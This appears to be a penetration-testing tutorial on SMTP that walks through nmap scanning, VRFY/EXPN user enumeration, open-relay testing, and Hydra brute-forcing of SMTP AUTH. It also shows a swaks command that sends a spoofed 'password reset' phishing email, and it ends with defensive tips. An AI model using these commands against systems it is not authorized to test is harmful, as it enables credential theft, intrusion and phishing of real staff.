Understanding and Exploiting SMTP: A Pentester’s Guide
Category: Exploiting Services
Author: Offensive Cyber Professional
Focus: Enumeration → Exploitation → Post-Exploitation
Overview: What is SMTP?
SMTP (Simple Mail Transfer Protocol) is the protocol used to send emails across networks. It operates over TCP port 25 (and sometimes 587 or 465 for submission and encrypted channels). While it’s essential for mail delivery, SMTP servers can also leak sensitive information or become entry points if misconfigured.
As a pentester, understanding SMTP is critical for:
- Information gathering: Enumerating users
- Brute-force attacks: Cracking credentials
- Command injection: If combined with vulnerable webmail interfaces
- Pivoting or spoofing: Sending crafted emails internally
SMTP Basics
- Default Port: 25 (unencrypted), 587 (STARTTLS), 465 (SMTPS)
- Protocol: TCP
- Common Software: Postfix, Exim, Sendmail, Microsoft Exchange
SMTP isn’t used for reading email (that’s IMAP or POP3). It’s used for sending email to other mail servers or relays.
Scanning for SMTP
Start with Nmap to check if SMTP is open and determine the server type.
nmap -p 25,465,587 -sV <target-ip>
# Checks for SMTP-related ports and service version
Use Nmap’s SMTP-specific scripts:
nmap -p 25 --script smtp-enum-users,smtp-open-relay,smtp-commands <target-ip>
# smtp-enum-users: tries VRFY and EXPN to discover users
# smtp-open-relay: checks if the server can relay spam
# smtp-commands: lists supported SMTP commands
Enumeration
Once you’ve found an SMTP service, connect manually and test it using Netcat or Telnet.
telnet <target-ip> 25
Typical banner:
220 mail.target.com ESMTP Postfix
Test VRFY:
VRFY root
VRFY admin
Test EXPN:
EXPN root
These commands try to validate if a user exists.
Useful Tool: smtp-user-enum
smtp-user-enum -M VRFY -U users.txt -t <target-ip>
# Enumerate usernames via VRFY
Exploitation
1. SMTP Open Relay Abuse
An open relay allows you to send mail to any domain without authentication. This can be abused to send phishing emails, spam, or malicious payloads.
Test with swaks:
swaks --to victim@example.com --from attacker@attacker.com --server <target-ip>
# If it works without auth, it's an open relay
2. SMTP Credential Brute-Force
Try SMTP AUTH brute-forcing with Hydra:
hydra -S -s 587 -V -f -l user -P /usr/share/wordlists/rockyou.txt <target-ip> smtp
3. Email Spoofing (Internal Phishing)
If no authentication is needed, craft and send internal-looking emails from a spoofed sender:
swaks --to ceo@company.com --from it-support@company.com --server <target-ip> --data "Subject: Urgent Password Reset\n\nClick here."
4. Command Injection via Email Parsers
Sometimes, the SMTP service integrates with local scripts (e.g., contact forms or mail forwarding). If these scripts don’t sanitize input properly, they can be vulnerable to command injection or shell escape via crafted email headers (like Subject: or From:). This is rare but possible in older internal environments.
Post-Exploitation (if SMTP server is compromised)
If you gain access to the mail server:
- Dump mailbox contents – Look for credentials, internal comms, or reset links
- Abuse trust – Pivot using spoofed emails or forged internal messages
- Check for sensitive config files:
main.cf,.forward,.procmailrc, etc.
Useful Tools
| Tool | Purpose |
|---|---|
swaks | Custom SMTP testing (SMTP Swiss Army Knife) |
smtp-user-enum | Username enumeration via SMTP |
hydra | Brute-force SMTP AUTH credentials |
msfconsole | Modules like auxiliary/scanner/smtp/smtp_enum and smtp_relay |
Defense Tips (Blue Team Perspective)
- Disable or tightly control VRFY and EXPN
- Require authentication for mail relay
- Use TLS and proper SPF/DKIM/DMARC DNS records to prevent spoofing
- Keep SMTP daemons patched and isolated
Final Thoughts
SMTP might look like a simple email transport service, but it’s a goldmine when misconfigured. Usernames, spoofed messages, and unauthenticated relaying can all open doors into a network. Always check for misconfigurations manually and with automation. A single overlooked VRFY or open relay could be your way in.